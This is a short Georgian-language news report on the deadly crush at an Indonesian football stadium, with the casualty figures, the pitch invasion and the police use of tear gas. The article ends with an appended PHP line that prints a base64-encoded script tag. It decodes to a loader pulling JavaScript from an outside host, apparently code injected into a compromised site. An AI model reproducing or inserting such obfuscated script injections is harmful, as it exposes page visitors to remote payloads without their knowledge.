celsiusi
ავერსი შნაიდერი
ინდონეზიაში საფეხბურთო მატჩის შემდგომ მომხდარი ჭყლეტისას მსხვერპლის რაოდენობა 174-მდე გაიზარდა. ინციდენტი უკვე შეფასდა სტადიონზე მომხდარ მსოფლიოს ერთ-ერთ ყველაზე საშინელ კატასტროფად.
 
ბოლო მონაცემებით, დაშავებულია სულ მცირე 180 ადამიანი.
 
სტადიონზე ტრაგიკული ინციდენტი მას შემდეგ დაიწყო, რაც მასპინძელმა საფეხბურთო გუნდმა, „არემამ“ მატჩი პრინციპულ მეტოქესთან სავსე ტრიბუნების წინაშე წააგო, რის შემდეგაც გულშემატკივრები მოედანზე შეიჭრნენ.
 
პოლიციამ სტადიონზე შეჭრილი მაყურებლების დასაშლელად ცრემლსადენი გაზი გამოიყენა.
 
პანიკის დაწყების შემდეგ, ათასობით ადამიანი გასასვლელებისკენ გაიქცა, სადაც მსხვერპლის მიზეზი ჰაერის უკმარისობა გახდა.
398
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");